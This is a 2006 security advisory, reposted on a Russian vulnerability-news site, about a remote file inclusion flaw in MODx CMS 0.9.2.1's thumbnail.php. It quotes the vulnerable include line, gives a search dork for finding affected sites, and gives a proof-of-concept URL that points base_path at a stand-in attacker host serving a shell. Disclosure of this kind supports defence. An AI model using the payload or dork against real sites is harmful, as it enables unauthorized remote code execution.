Информационная безопасность
[RU] switch to
English Version



Дополнительная информация

  Ежедневная сводка ошибок в Web-приложениях (PHP, ASP, JSP, CGI, Perl )

  [SA22690] Yazd Discussion Forum Two Security Bypass Issues

  FreeWebshop.org Script <= 2.2.2 Multiple Remote Vulnerabilities

  Advisory 12/2006: phpMyAdmin - error.php XSS Vulnerability

From:nuffsaid <nuffsaid_(at)_newbslove.us>
Date:3 ноября 2006 г.
Subject:MODx CMS 0.9.2.1 (base_path) Remote File Include Vulnerability

+--------------------------------------------------------------------------------
-----------
+ MODx CMS 0.9.2.1 (base_path) Remote File Include Vulnerability
+--------------------------------------------------------------------------------
-----------
+ Affected Software .: MODx CMS 0.9.2.1
+ Vendor ............: http://modxcms.com/
+ Download ..........: http://modxcms.com/downloads.html
+ Description .......: "MODx is an open source PHP Application Framework that helps you take control of your online content."
+ Dork ..............: "powered by MODx"
+ Class .............: Remote File Inclusion
+ Risk ..............: High (Remote File Execution)
+ Found By ..........: nuffsaid <nuffsaid[at]newbslove.us>
+--------------------------------------------------------------------------------
-----------
+ Details:
+ MODx CMS manager/media/browser/mcpuk/connectors/php/commands/thumbnail.php does not initialize
+ the $base_path variable before using it to include files, assuming register_globals = on,
+ we can intialize the variable in a query string and include a remote file of our choice.
+
+ Vulnerable Code:
+ manager/media/browser/mcpuk/connectors/php/commands/thumbnail.php, line(s) 24:
+ -> include $base_path.
"manager/media/browser/mcpuk/connectors/php/Commands/helpers/iconlookup.
php";
+
+ Proof Of Concept:
+ http:
//[target]/[path]/manager/media/browser/mcpuk/connectors/php/Commands/Thumbnail.
php?base_path=http://evilsite.com/shell.php?
+--------------------------------------------------------------------------------
-----------

О сайте | Условия использования
© SecurityVulns, 3APA3A, Владимир Дубровин
Нижний Новгород

 
 



Rating@Mail.ru
test server